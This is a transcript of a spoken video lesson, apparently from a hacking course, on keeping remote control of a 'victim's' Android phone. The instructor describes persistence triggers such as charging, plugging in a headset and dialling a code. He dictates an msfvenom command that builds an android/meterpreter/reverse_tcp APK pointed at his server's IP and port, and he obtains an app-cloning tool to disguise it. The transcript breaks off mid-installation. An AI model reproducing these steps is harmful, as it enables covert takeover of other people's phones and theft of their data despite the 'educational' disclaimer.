Hello guys, how are you all? Okay, welcome to this class. Okay, this is an introduction basically. See, let me tell you one thing, okay? See, always remember you, whenever just assume that, okay? If you just hacked your victim, okay? You just hacked your target, okay? Just listen carefully, okay? Sometimes what will happen means we completely lost our connection, okay? We can't able to control him permanently. So let me tell you some tricks and to make your payload persistence, like it will run, okay? Whenever victim plug his charger, okay, the payload will run, okay? Whenever victim remove his charger pin, okay, the victim connection will be closed, okay? Whenever victim connect his headset, okay, that time we get our connection, okay? Assume that, okay? Whenever victim dial one code in his mobile device, okay, we will get that time, that time victim can we get the connection, okay? Assume that we need a connection, okay? In last classes we see whenever victim turn off his phone, restart his mobile phone, we completely lost our connection. Okay, even the phone is turned on, but also we can't able to control it, okay? Because this is how it is work, okay, Metasploit. But we need to modify it, okay? Like assume that we are completely lost our connection, okay? Yes, this is not a persistence. Assume that always remember every mobile phone need charge, okay? It's need to charge. Yes, just assume it. Victim charge his mobile phone, okay, that time our connection will be back, okay? Just assume it. Everyone will listen music, okay? Just assume it. Whenever victim connect his jack, okay, I am not talking about wireless, okay? Yes, I am talking about the jack. Whenever victim connects his jack, that headphone jack, that time we will get our connection back. Assume that whenever victim open a calculator and type one particular something like 1 plus 1 or something like that, that time we will get our connection. Assume that victim go in the dial location and just type one code like something star hash 1211 star hash something like that, that time we will get the connection. This just again I am saying, if the victim restart his computer Android device, then also we will get the connection. Yes, so just see, I just teach you in last classes how you can modify the APK by changing the icons. I'm totally leaving on you, okay? I'm just making a payload which can work these features, okay? Like charging, headphone jack hack, okay? It will work. But after making this type of attacks, you need to think by yourself, okay? How can you modify it, okay? I will teach each and every method to you because my main goal is to teach everything, okay? Like a methods which are seems like an professional or something like that, okay? I want to teach real things, okay? Okay, let me teach you one thing, okay? This is a introduction. In next class we will talk about something, okay? Let me tell you one thing, the which applications we need, okay? Simple, we need an Android device. Okay, so that's why I am not open any virtual machine there. See this, I am using Android device, okay? In Android, assume that this is your Android device, okay? Yes, I am doing each and everything for educational purpose, okay? I am not responsible for any activities which you guys done, okay? My main motive is to teach a real things, okay? Yes, just follow it, okay? Click let me go in the Chrome. Okay, just search here app cloner premium. You can simply go and download. I am just downloading this one. See, you guys can find these types of website. According to me, let me go here and type happy mode. Okay, here it is. There is a 2.3.3 version is there, which is
decline, let me decline this. Okay, we close. Okay, download APK. Don't click on the fast download. Okay, click on download simple, because it will download the happy mode for you. Okay, yes, this is very easy process. No need to worry about that. No coding, nothing. Okay. Okay, let me next. Okay, click on. Okay, right. Okay, it will start downloading. Okay, until that, in this class, let me where is the RDP? Let me show you, let me make a payload for it. Okay, because I am each and everything I am modifying here. Okay, yes. Okay, okay, here it is, my VPS. Okay, now I just need to make a payload simple. Okay, I am not using any source code, I am not editing anything. Okay, I am just showing you very easy process. Very easy means very easy. You guys can in this series, you guys can see how this is very easy. Okay, yes, let me show you. Let me go in my C. Let me go to the Metasploit framework is there. Go to the bin. Okay, now there is a already Metasploit is created. Let me delete it. Okay, let me create new one. Okay, just type cmd here. Let me create one payload, which is msf venom dash p. okay, sorry. Okay, man dash p android forward slash meter printer. Always remember, in my classes I don't give commands. Okay, you guys need to pause the video and see that. Okay, because if I give the command, you guys simply copy and paste it. Okay, just try to remember these types of commands. Okay, reverse underscore tcp. okay, lhost, remember here again I am saying keep equal. Okay, now type your RDP IP 80.85.1, I think 158.235. Yes, just give space. L port is equal, let me give something like 4488. Okay, let me note down in my 4488. I'm just giving this port here. Okay, just dash o for output. Let me give it as a modify dot sorry, let me give as a, let me white sec, enter. Okay, it will take some time. Okay, will take 1 minute. Should I pause the video? No need, just watch it. Okay, okay, it's you can simply pause it. Okay, like you can. Forward it. Okay, right. Let me remove this all. Until that, let me check. Okay, it's successfully created. Whitesec.apk. Here it is. 10 KB. Let me copy it. Okay, let me paste it here. Right. Okay. Right. Okay, let me go to the home as well. Right. It's having 2 MB, I think. Oh, yes. there is, again I am saying, there is no APK, there is no, this is safe. Don't think this is a, what, Metasploit payload. This is nothing but, it's already given by Android Studio, okay. Let me see, it's recording or not. Yes, it's recording. Okay, just click here and install it. Open. Let me see it working or not. Because sometimes app cloner won't work, okay. See, app keeps stopping. App info. Was let me open this. Hope it will work right now. Okay, I need to use my Android real Android device, I think so. Okay, let me use the app player. Okay, here it is. Okay, let me where it is. Okay, let me go in the files. Okay, it's not working. Let me install in this player. Okay.